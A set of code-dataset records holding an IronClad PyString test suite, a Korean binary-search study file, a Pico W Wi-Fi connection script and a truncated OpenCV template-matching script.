tests.utils.runtest import automakesuite, run\n\nfrom tests.utils.allocators import GetAllocatingTestAllocator\nfrom tests.utils.memory import OffsetPtr, CreateTypes, PtrToStructure\nfrom tests.utils.testcase import TestCase, WithMapper\nfrom tests.utils.typetestcase import TypeTestCase\n\nfrom System import Array, Byte, Char, IntPtr, Type, UInt32\nfrom System.Runtime.InteropServices import Marshal\nfrom Ironclad import CPyMarshal, dgt_int_ptrintptr, dgt_int_ptrptr, dgt_ptr_ptrptr, PythonMapper\nfrom Ironclad.Structs import PyStringObject, PyTypeObject, PyBufferProcs, PySequenceMethods, Py_TPFLAGS\n\n\nclass PyString_TestCase(TestCase):\n\n def byteArrayFromString(self, testString):\n testLength = len(testString)\n chars = testString.ToCharArray()\n return Array.ConvertAll[Char, Byte](chars, lambda c: ord(c))\n\n\n def ptrFromByteArray(self, bytes):\n testData = Marshal.AllocHGlobal(bytes.Length + 1)\n Marshal.Copy(bytes, 0, testData, bytes.Length)\n Marshal.WriteByte(OffsetPtr(testData, bytes.Length), 0)\n return testData\n\n\n def dataPtrFromStrPtr(self, strPtr):\n return OffsetPtr(strPtr, Marshal.OffsetOf(PyStringObject, \"ob_sval\"))\n\n\n def fillStringDataWithBytes(self, strPtr, bytes):\n strDataPtr = self.dataPtrFromStrPtr(strPtr)\n Marshal.Copy(bytes, 0, strDataPtr, len(bytes))\n\n\n def getStringWithValues(self, start, pastEnd):\n return \"\".join(chr(c) for c in range(start, pastEnd))\n\n\n def assertHasStringType(self, ptr, mapper):\n self.assertEquals(CPyMarshal.ReadPtrField(ptr, PyStringObject, \"ob_type\"), mapper.PyString_Type, \"bad type\")\n\n\n def assertStringObjectHasLength(self, strPtr, length):\n stringObject = PtrToStructure(strPtr, PyStringObject)\n self.assertEquals(stringObject.ob_refcnt, 1, \"unexpected refcount\")\n self.assertEquals(stringObject.ob_size, length, \"unexpected ob_size\")\n self.assertEquals(stringObject.ob_shash, -1, \"unexpected currently-useless-field\")\n self.assertEquals(stringObject.ob_sstate, 0, \"unexpected currently-useless-field\")\n \n strDataPtr = self.dataPtrFromStrPtr(strPtr)\n terminatorPtr = OffsetPtr(strDataPtr, length)\n self.assertEquals(Marshal.ReadByte(terminatorPtr), 0, \"string not terminated\")\n\n\n def assertStringObjectHasDataBytes(self, strPtr, expectedBytes):\n strDataPtr = self.dataPtrFromStrPtr(strPtr)\n testLength = len(expectedBytes)\n writtenBytes = Array.CreateInstance(Byte, testLength)\n Marshal.Copy(strDataPtr, writtenBytes, 0, testLength)\n\n self.assertEquals(len(writtenBytes), testLength, \"copied wrong\")\n for (actual, expected) in zip(writtenBytes, expectedBytes):\n self.assertEquals(actual, expected, \"failed to copy string data correctly\")\n\n\nclass PyString_Type_Test(TypeTestCase):\n \n def testString_tp_free(self):\n self.assertUsual_tp_free(\"PyString_Type\")\n \n def testString_tp_dealloc(self):\n self.assertUsual_tp_dealloc(\"PyString_Type\")\n\n\n @WithMapper\n def testFlags(self, mapper, _):\n flags = CPyMarshal.ReadUIntField(mapper.PyString_Type, PyTypeObject, \"tp_flags\")\n self.assertEquals(flags & UInt32(Py_TPFLAGS.HAVE_GETCHARBUFFER), UInt32(Py_TPFLAGS.HAVE_GETCHARBUFFER))\n \n\n @WithMapper\n def testSizes(self, mapper, _):\n tp_basicsize = CPyMarshal.ReadIntField(mapper.PyString_Type, PyTypeObject, 'tp_basicsize')\n self.assertNotEquals(tp_basicsize, 0)\n tp_itemsize = CPyMarshal.ReadIntField(mapper.PyString_Type, PyTypeObject, 'tp_itemsize')\n self.assertNotEquals(tp_itemsize, 0)\n\n\n @WithMapper\n def testStringifiers(self, mapper, _):\n IC_PyString_Str = mapper.GetFuncPtr(\"IC_PyString_Str\")\n tp_str = CPyMarshal.ReadPtrField(mapper.PyString_Type, PyTypeObject, \"tp_str\")\n self.assertEquals(tp_str, IC_PyString_Str)\n \n PyObject_Repr = mapper.GetFuncPtr(\"PyObject_Repr\")\n tp_repr = CPyMarshal.ReadPtrField(mapper.PyString_Type, PyTypeObject, \"tp_repr\")\n self.assertEquals(tp_repr, PyObject_Repr)\n\n\n @WithMapper\n def testSequenceProtocol(self, mapper, _):\n strPtr = mapper.PyString_Type\n \n seqPtr = CPyMarshal.ReadPtrField(strPtr, PyTypeObject, 'tp_as_sequence')\n self.assertNotEquals(seqPtr, IntPtr.Zero)\n concatPtr = CPyMarshal.ReadPtrField(seqPtr, PySequenceMethods, 'sq_concat')\n # concat_core tested further down\n self.assertEquals(concatPtr, mapper.GetFuncPtr('IC_PyString_Concat_Core'))\n \n \n @WithMapper\n def testBufferProtocol(self, mapper, later):\n # should all be implemented in C really, but weaving cpy string type into\n # our code feels too much like hard work for now\n strPtr = mapper.PyString_Type\n \n bufPtr = CPyMarshal.ReadPtrField(strPtr, PyTypeObject, 'tp_as_buffer')\n self.assertNotEquals(bufPtr, IntPtr.Zero)\n getreadbuffer = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getreadbuffer', dgt_int_ptrintptr)\n getwritebuffer = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getwritebuffer', dgt_int_ptrintptr)\n getcharbuffer = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getcharbuffer', dgt_int_ptrintptr)\n getsegcount = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getsegcount', dgt_int_ptrptr)\n \n ptrptr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n later(lambda: Marshal.FreeHGlobal(ptrptr))\n \n strptr = mapper.Store(\"hullo\")\n for getter in (getreadbuffer, getcharbuffer):\n self.assertEquals(getter(strptr, 0, ptrptr), 5)\n self.assertEquals(CPyMarshal.ReadPtr(ptrptr), CPyMarshal.GetField(strptr, PyStringObject, 'ob_sval'))\n self.assertEquals(getter(strptr, 1, ptrptr), -1)\n self.assertMapperHasError(mapper, SystemError)\n \n self.assertEquals(getwritebuffer(strptr, 0, ptrptr), -1)\n self.assertMapperHasError(mapper, SystemError)\n \n self.assertEquals(getsegcount(strptr, ptrptr), 1)\n self.assertEquals(CPyMarshal.ReadInt(ptrptr), 5)\n self.assertEquals(getsegcount(strptr, IntPtr.Zero), 1)\n\n\nclass PyString_FromString_Test(PyString_TestCase):\n\n def testCreatesString(self):\n allocs = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n testString = \"beset on all sides\" + self.getStringWithValues(1, 256)\n bytes = self.byteArrayFromString(testString)\n testData = self.ptrFromByteArray(bytes)\n try:\n strPtr = mapper.PyString_FromString(testData)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, len(bytes) + baseSize)], \"allocated wrong\")\n self.assertStringObjectHasLength(strPtr, len(bytes))\n self.assertStringObjectHasDataBytes(strPtr, bytes)\n self.assertEquals(mapper.Retrieve(strPtr), testString, \"failed to map pointer correctly\")\n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(testData)\n deallocTypes()\n\n\nclass PyString_Concat_Test(PyString_TestCase):\n\n @WithMapper\n def testBasic(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(\"one two\")\n mapper.IncRef(part1Ptr) # avoid garbage collection\n part2Ptr = mapper.Store(\" three\")\n startingRefCnt = mapper.RefCount(part1Ptr)\n \n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_Concat(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, None)\n \n\n newStringPtr = Marshal.ReadIntPtr(stringPtrPtr)\n self.assertEquals(mapper.Retrieve(newStringPtr), \"one two three\")\n\n self.assertEquals(startingRefCnt - mapper.RefCount(part1Ptr), 1)\n\n\n @WithMapper\n def testErrorCaseSecondArg(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(\"one two\")\n mapper.IncRef(part1Ptr) # avoid garbage collection\n startingRefCnt = mapper.RefCount(part1Ptr)\n \n part2Ptr = mapper.Store(3)\n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_Concat(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, TypeError)\n\n self.assertEquals(Marshal.ReadIntPtr(stringPtrPtr), IntPtr(0))\n self.assertEquals(startingRefCnt - mapper.RefCount(part1Ptr), 1)\n\n\n @WithMapper\n def testErrorCaseSecondArg(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(17)\n mapper.IncRef(part1Ptr) # avoid garbage collection\n startingRefCnt = mapper.RefCount(part1Ptr)\n\n part2Ptr = mapper.Store(\"three\")\n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_Concat(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, TypeError)\n\n self.assertEquals(Marshal.ReadIntPtr(stringPtrPtr), IntPtr(0))\n self.assertEquals(startingRefCnt - mapper.RefCount(part1Ptr), 1)\n\n\nclass PyString_ConcatAndDel_Test(PyString_TestCase):\n\n @WithMapper\n def testBasic(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(\"one two\")\n mapper.IncRef(part1Ptr) # avoid garbage collection\n startingPart1RefCnt = mapper.RefCount(part1Ptr)\n \n part2Ptr = mapper.Store(\" three\")\n mapper.IncRef(part2Ptr) # avoid garbage collection\n startingPart2RefCnt = mapper.RefCount(part2Ptr)\n\n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_ConcatAndDel(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, None)\n\n newStringPtr = Marshal.ReadIntPtr(stringPtrPtr)\n self.assertEquals(mapper.Retrieve(newStringPtr), \"one two three\")\n\n self.assertEquals(startingPart1RefCnt - mapper.RefCount(part1Ptr), 1)\n self.assertEquals(startingPart2RefCnt - mapper.RefCount(part2Ptr), 1)\n \n\n\nclass InternTest(PyString_TestCase):\n \n @WithMapper\n def testInternExisting(self, mapper, addToCleanUp):\n testString = \"mars needs women\" + self.getStringWithValues(1, 256)\n bytes = self.byteArrayFromString(testString)\n testData = self.ptrFromByteArray(bytes)\n \n sp1 = mapper.PyString_FromString(testData)\n addToCleanUp(lambda: Marshal.FreeHGlobal(sp1p))\n\n sp2 = mapper.PyString_InternFromString(testData)\n addToCleanUp(lambda: Marshal.FreeHGlobal(testData))\n\n self.assertNotEquals(sp1, sp2)\n self.assertFalse(mapper.Retrieve(sp1) is mapper.Retrieve(sp2))\n self.assertEquals(mapper.RefCount(sp1), 1)\n self.assertEquals(mapper.RefCount(sp2), 2, 'failed to grab extra reference to induce immortality')\n \n mapper.IncRef(sp1)\n sp1p = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n CPyMarshal.WritePtr(sp1p, sp1)\n mapper.PyString_InternInPlace(sp1p)\n sp1i = CPyMarshal.ReadPtr(sp1p)\n self.assertEquals(sp1i, sp2, 'failed to intern')\n self.assertTrue(mapper.Retrieve(sp1i) is mapper.Retrieve(sp2))\n self.assertEquals(mapper.RefCount(sp1), 1, 'failed to decref old string')\n self.assertEquals(mapper.RefCount(sp2), 3, 'failed to incref interned string')\n\n\n\nclass PyString_FromStringAndSize_Test(PyString_TestCase):\n\n def testCreateEmptyString(self):\n allocs = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n try:\n testString = \"we run the grease racket in this town\" + self.getStringWithValues(0, 256)\n testLength = len(testString)\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, testLength)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, testLength + baseSize)], \"allocated wrong\")\n self.assertStringObjectHasLength(strPtr, testLength)\n self.assertHasStringType(strPtr, mapper)\n testBytes = self.byteArrayFromString(testString)\n self.fillStringDataWithBytes(strPtr, testBytes)\n\n resultStr = mapper.Retrieve(strPtr)\n self.assertEquals(resultStr, testString, \"failed to read string data\")\n \n strPtr2 = mapper.Store(resultStr)\n self.assertEquals(strPtr2, strPtr, \"did not remember already had this string\")\n self.assertEquals(mapper.RefCount(strPtr), 2, \"did not incref on store\")\n finally:\n mapper.Dispose()\n deallocTypes()\n\n\n def testCreateStringWithData(self):\n allocs = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n try:\n testString = \"we also run the shovel racket\" + self.getStringWithValues(0, 256)\n testBytes = self.byteArrayFromString(testString)\n testData = self.ptrFromByteArray(testBytes)\n testLength = len(testString)\n\n strPtr = mapper.PyString_FromStringAndSize(testData, testLength)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, testLength + baseSize)], \"allocated wrong\")\n self.assertHasStringType(strPtr, mapper)\n self.assertStringObjectHasLength(strPtr, testLength)\n self.assertStringObjectHasDataBytes(strPtr, testBytes)\n self.assertEquals(mapper.Retrieve(strPtr), testString, \"failed to read string data\")\n finally:\n mapper.Dispose()\n deallocTypes()\n\n\nclass _PyString_Resize_Test(PyString_TestCase):\n\n def testErrorHandling(self):\n allocs = []\n frees = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, frees))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n ptrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n\n try:\n data = mapper.PyString_FromStringAndSize(IntPtr.Zero, 365)\n Marshal.WriteIntPtr(ptrPtr, data)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(data, 365 + baseSize)], \"allocated wrong\")\n self.assertEquals(mapper._PyString_Resize(ptrPtr, 2000000000), -1, \"bad return on error\")\n self.assertEquals(type(mapper.LastException), MemoryError, \"wrong exception type\")\n self.assertTrue(data in frees, \"did not deallocate\") \n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(ptrPtr)\n deallocTypes()\n\n\n def testShrink(self):\n allocs = []\n frees = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, frees))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n oldLength = 365\n newLength = 20\n ptrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n\n try:\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, oldLength)\n Marshal.WriteIntPtr(ptrPtr, strPtr)\n \n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, oldLength + baseSize)], \"allocated wrong\")\n self.assertEquals(mapper._PyString_Resize(ptrPtr, newLength), 0, \"bad return on success\")\n \n self.assertHasStringType(strPtr, mapper)\n self.assertStringObjectHasLength(strPtr, newLength)\n\n self.assertEquals(allocs, [(strPtr, oldLength + baseSize)], \"unexpected extra alloc\")\n self.assertEquals(frees, [], \"unexpected frees\")\n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(ptrPtr)\n deallocTypes()\n\n\n def testGrow(self):\n allocs = []\n frees = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, frees))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n oldLength = 20\n testString = \"slings and arrows\" + self.getStringWithValues(0, 256)\n newLength = len(testString)\n\n oldStrPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, oldLength)\n ptrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n \n try:\n Marshal.WriteIntPtr(ptrPtr, oldStrPtr)\n newStrPtr = IntPtr.Zero\n \n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(oldStrPtr, oldLength + baseSize)], \"allocated wrong\")\n self.assertEquals(mapper._PyString_Resize(ptrPtr, newLength), 0, \"bad return on success\")\n\n newStrPtr = Marshal.ReadIntPtr(ptrPtr)\n expectedAllocs = [(oldStrPtr, oldLength + baseSize), (newStrPtr, newLength + baseSize)]\n self.assertEquals(allocs, expectedAllocs,\n \"allocated wrong\")\n self.assertEquals(frees, [oldStrPtr], \"did not free unused memory\")\n\n self.assertHasStringType(newStrPtr, mapper)\n self.assertStringObjectHasLength(newStrPtr, newLength)\n\n testBytes = self.byteArrayFromString(testString)\n self.fillStringDataWithBytes(newStrPtr, testBytes)\n\n self.assertEquals(mapper.Retrieve(newStrPtr), testString, \"failed to read string data\")\n if oldStrPtr != newStrPtr:\n # this would otherwise fail (very, very rarely)\n self.assertEquals(oldStrPtr in frees, True)\n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(ptrPtr)\n deallocTypes()\n \n\nclass PyString_Size_Test(PyString_TestCase):\n \n @WithMapper\n def testWorks(self, mapper, _):\n testString = \"Oh, sure, Lisa -- some wonderful, magical animal.\" + self.getStringWithValues(0, 256)\n testLength = len(testString)\n \n strPtr = mapper.Store(testString)\n self.assertEquals(mapper.PyString_Size(strPtr), testLength)\n\n\nclass PyString_OtherMethodsTest(TestCase):\n \n @WithMapper\n def testStringifiers(self, mapper, _):\n src = 'foo \\0 bar \" \\' \" \\' supercalifragilisticexpialidocious'\n srcPtr = mapper.Store(src)\n \n str_ = mapper.Retrieve(mapper.IC_PyString_Str(srcPtr))\n self.assertEquals(str_, src)\n self.assertEquals(mapper.IC_PyString_Str(mapper.Store(object())), IntPtr.Zero)\n self.assertMapperHasError(mapper, TypeError)\n \n for smartquotes in (0, 1):\n # smartquotes is ignored for now\n repr_ = mapper.Retrieve(mapper.PyString_Repr(srcPtr, smartquotes))\n self.assertEquals(repr_, repr(src))\n self.assertEquals(mapper.PyString_Repr(mapper.Store(object()), smartquotes), IntPtr.Zero)\n self.assertMapperHasError(mapper, TypeError)\n \n @WithMapper\n def testConcat(self, mapper, _):\n strs = ('', 'abc', '\\0xo')\n for s1 in strs:\n for s2 in strs:\n s3ptr = mapper.IC_PyString_Concat_Core(mapper.Store(s1), mapper.Store(s2))\n self.assertEquals(mapper.Retrieve(s3ptr), s1 + s2)\n\n\nclass PyString_AsStringTest(PyString_TestCase):\n \n @WithMapper\n def testWorks(self, mapper, _):\n strPtr = mapper.Store(\"You're fighting a business hippy. This is a hippy that understands the law of supply and demand.\")\n strData = CPyMarshal.Offset(strPtr, Marshal.OffsetOf(PyStringObject, 'ob_sval'))\n self.assertEquals(mapper.PyString_AsString(strPtr), self.dataPtrFromStrPtr(strPtr))\n \n notstrPtr = mapper.Store(object())\n self.assertEquals(mapper.PyString_AsString(notstrPtr), IntPtr.Zero)\n self.assertMapperHasError(mapper, TypeError)\n\n\n @WithMapper\n def testDoesNotActualiseString(self, mapper, _):\n testString = \"She's the oldest planet-cracker in existence\"\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, len(testString))\n \n self.fillStringDataWithBytes(strPtr, self.byteArrayFromString(\"blah blah nonsense blah\"))\n mapper.PyString_AsString(strPtr) # this should NOT bake the string data\n self.fillStringDataWithBytes(strPtr, self.byteArrayFromString(testString))\n \n self.assertEquals(mapper.Retrieve(strPtr), testString)\n\n\nclass PyString_AsStringAndSizeTest(PyString_TestCase):\n \n @WithMapper\n def testWorksWithEmbeddedNulls(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n testStr = \"You're fighting a saber-toothed ferret.\" + self.getStringWithValues(0, 256)\n strPtr = mapper.Store(testStr)\n dataPtr = self.dataPtrFromStrPtr(strPtr)\n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, sizePtr), 0)\n self.assertEquals(CPyMarshal.ReadPtr(dataPtrPtr), dataPtr)\n self.assertEquals(CPyMarshal.ReadInt(sizePtr), len(testStr))\n self.assertMapperHasError(mapper, None)\n \n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, IntPtr.Zero), -1)\n self.assertMapperHasError(mapper, TypeError)\n \n \n @WithMapper\n def testWorksWithoutEmbeddedNulls(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n testStr = \"You're fighting Ed the Undying.\" + self.getStringWithValues(1, 256)\n strPtr = mapper.Store(testStr)\n dataPtr = self.dataPtrFromStrPtr(strPtr)\n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, sizePtr), 0)\n self.assertEquals(CPyMarshal.ReadPtr(dataPtrPtr), dataPtr)\n self.assertEquals(CPyMarshal.ReadInt(sizePtr), len(testStr))\n self.assertMapperHasError(mapper, None)\n \n CPyMarshal.Zero(dataPtrPtr, CPyMarshal.PtrSize * 2)\n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, IntPtr.Zero), 0)\n self.assertEquals(CPyMarshal.ReadPtr(dataPtrPtr), dataPtr)\n self.assertMapperHasError(mapper, None)\n\n \n @WithMapper\n def testWorksWithNonString(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n self.assertEquals(mapper.PyString_AsStringAndSize(mapper.Store(object()), dataPtrPtr, sizePtr), -1)\n self.assertMapperHasError(mapper, TypeError)\n\n\n @WithMapper\n def testDoesNotActualiseString(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n testString = \"You find a frozen Mob Penguin.\"\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, len(testString))\n \n self.fillStringDataWithBytes(strPtr, self.byteArrayFromString(\"blah blah nonsense\"))\n mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, sizePtr) # this should NOT bake the string data\n self.fillStringDataWithBytes(strPtr, self.byteArrayFromString(testString))\n \n self.assertEquals(mapper.Retrieve(strPtr), testString)\n \n\nclass PyStringStoreTest(PyString_TestCase):\n \n def testStoreStringCreatesStringType(self):\n allocs = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n testString = \"fnord\" + self.getStringWithValues(1, 256)\n testBytes = self.byteArrayFromString(testString)\n testData = self.ptrFromByteArray(testBytes)\n testLength = len(testString)\n\n try:\n strPtr = mapper.Store(testString)\n baseSize = Marshal.SizeOf(PyStringObject())\n \n self.assertEquals(allocs, [(strPtr, testLength + baseSize)], \"allocated wrong\")\n self.assertHasStringType(strPtr, mapper)\n self.assertStringObjectHasLength(strPtr, testLength)\n self.assertStringObjectHasDataBytes(strPtr, testBytes)\n self.assertEquals(mapper.Retrieve(strPtr), testString, \"failed to read string data\")\n \n strPtr2 = mapper.Store(testString)\n self.assertEquals(strPtr2, strPtr, \"did not remember already had this string\")\n self.assertEquals(mapper.RefCount(strPtr), 2, \"did not incref on store\")\n finally:\n mapper.Dispose()\n deallocTypes()\n\nsuite = automakesuite(locals())\n\nif __name__ == '__main__':\n run(suite)\n","repo_name":"IronLanguages/ironclad","sub_path":"tests/stringtest.py","file_name":"stringtest.py","file_ext":"py","file_size_in_byte":25409,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"67"} +{"seq_id":"71962274133","text":"# 내가 푼 풀이\ndef binary_search(element, some_list, start_index=0, end_index=None):\n # end_index가 따로 주어지지 않은 경우에는 리스트의 마지막 인덱스\n if end_index == None:\n end_index = len(some_list) - 1\n\n # 코드를 작성하세요.\n midpoint = (start_index + end_index) // 2\n if start_index > end_index:\n return None\n if some_list[midpoint] == element:\n return midpoint\n elif some_list[midpoint] > element:\n return binary_search(element, some_list[:midpoint])\n elif some_list[midpoint] < element:\n return midpoint + 1 + binary_search(element, some_list[midpoint+1:])\n\nprint(binary_search(2, [2, 3, 5, 7, 11]))\nprint(binary_search(0, [2, 3, 5, 7, 11]))\nprint(binary_search(5, [2, 3, 5, 7, 11]))\nprint(binary_search(3, [2, 3, 5, 7, 11]))\nprint(binary_search(11, [2, 3, 5, 7, 11]))\n\n# 내가 푼 풀이는 재귀로 들어가는 리스트 자체를 슬라이싱하고 인덱스 값을 더해주면서 반복시키는 것이고\n# 풀이에서의 방법은, 스타트인덱스와 엔드인덱스를 직접 지정해주면서 따로 인덱스값은 저장하지 않는 풀이방법이다.\n\n# 공식 정답\n\ndef binary_search(element, some_list, start_index=0, end_index=None):\n # end_index가 따로 주어지지 않은 경우에는 리스트의 마지막 인덱스\n if end_index == None:\n end_index = len(some_list) - 1\n\n # start_index가 end_index보다 크면 some_list안에 element는 없다\n if start_index > end_index:\n return None\n\n # 범위의 중간 인덱스를 찾는다\n mid = (start_index + end_index) // 2\n\n # 이 인덱스의 값이 찾는 값인지 확인을 해준다\n if some_list[mid] == element:\n return mid\n\n # 찾는 항목이 중간 값보다 작으면 리스트 왼쪽을 탐색해준다\n if element < some_list[mid]:\n return binary_search(element, some_list, start_index, mid - 1)\n\n # 찾는 항목이 중간 값보다 크면 리스트 오른쪽을 탐색해준다\n else:\n return binary_search(element, some_list, mid + 1, end_index)\n\n\nprint(binary_search(2, [2, 3, 5, 7, 11]))\nprint(binary_search(0, [2, 3, 5, 7, 11]))\nprint(binary_search(5, [2, 3, 5, 7, 11]))\nprint(binary_search(3, [2, 3, 5, 7, 11]))\nprint(binary_search(11, [2, 3, 5, 7, 11]))","repo_name":"OhJeongHo/Python_algorithm_study","sub_path":"알고리즘/07. 이진탐색 재귀로 구현하기.py","file_name":"07. 이진탐색 재귀로 구현하기.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7101972981","text":"import network\nimport rp2\nimport time\nimport socket\n\n\nrp2.country(\"CN\")\nwlan=network.WLAN(network.STA_IF)\nwlan.active(True)\nprint(wlan.scan())\n\n\nssid=\"Schubert\"\npw=\"xinxianshuo\"\nhost=\"10.0.0.1\"\nport=\"55551\"\n\n\ndef light_onboard_led(led_flag):\n led=machine.Pin(\"LED\",machine.Pin.OUT)\n if led_flag==1:\n led.on()\n elif led_flag==0:\n led.off()\n\ndef connect():\n wlan.connect(ssid,pw)\n timeout=10\n while timeout>0:\n if wlan.status()>=3:\n light_onboard_led(1)\n print(\"conntected to WIFI SSID: Schubert\")\n return 0\n timeout -=1\n print(\"waiting for connction to [Schubert]\")\n time.sleep(1)\n light_onboard_led(0) \n print(\"connection failed\")\n\nconnect()\n\n","repo_name":"anduinriver/pico-pilot","sub_path":"wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19043143909","text":"# -*- coding: UTF-8 -*-\nimport math\n\nimport cv2\nimport numpy as np\n\nfrom tools.DecoratorTools import calculate_time\nfrom tools.ImageOperate import clahe_equalize\n\n\ndef compute_overlap(x1, y1, w1, h1, x2, y2, w2, h2):\n\t# 计算矩形框的面积\n\tarea1 = w1 * h1\n\tarea2 = w2 * h2\n\t# 计算相交部分的坐标\n\tx_inter = max(x1, x2)\n\ty_inter = max(y1, y2)\n\tw_inter = min(x1 + w1, x2 + w2) - x_inter\n\th_inter = min(y1 + h1, y2 + h2) - y_inter\n\t# 计算相交部分的面积\n\tif w_inter <= 0 or h_inter <= 0:\n\t\treturn 0.0\n\tarea_inter = w_inter * h_inter\n\t# 计算并集的面积\n\tarea_union = area1 + area2 - area_inter\n\t# 计算重叠度\n\toverlap = area_inter / area_union\n\treturn overlap\n\n\ndef rotate_and_scale(image, angle, scale):\n\t\"\"\"\n\t旋转和比例不变变换\n\t:param image: 输入图像\n\t:param angle: 旋转角度\n\t:param scale: 缩放比例\n\t:return:\n\t\"\"\"\n\timg_resized = cv2.resize(image, (int(scale * image.shape[1]), int(scale * image.shape[0])))\n\trows, cols = img_resized.shape[:2]\n\t# 构造旋转变换矩阵\n\tM = cv2.getRotationMatrix2D((cols / 2, rows / 2), angle, 1)\n\tcols_new = int(cols * math.cos(angle) + rows * math.sin(angle))\n\trows_new = int(cols * math.sin(angle) + rows * math.cos(angle))\n\t# 进行旋转变换\n\timg_rotated = cv2.warpAffine(img_resized, M, (cols_new, rows_new))\n\treturn img_rotated\n\n\n@calculate_time\ndef template_match_multi(image, template, angle_step: int = 30, scale_start: float = 0.5, scale_stop: float = 1.0, scale_step: float = 0.2, similarity_threshold: float = 1.0, overlap_threshold=0.3):\n\t\"\"\"\n\t:param image:\n\t:param template:\n\t:param angle_step: 旋转步长\n\t:param scale_start: 放缩起始\n\t:param scale_stop: 放缩中止\n\t:param scale_step: 放缩步长\n\t:param similarity_threshold:相似度阈值\n\t:param overlap_threshold: 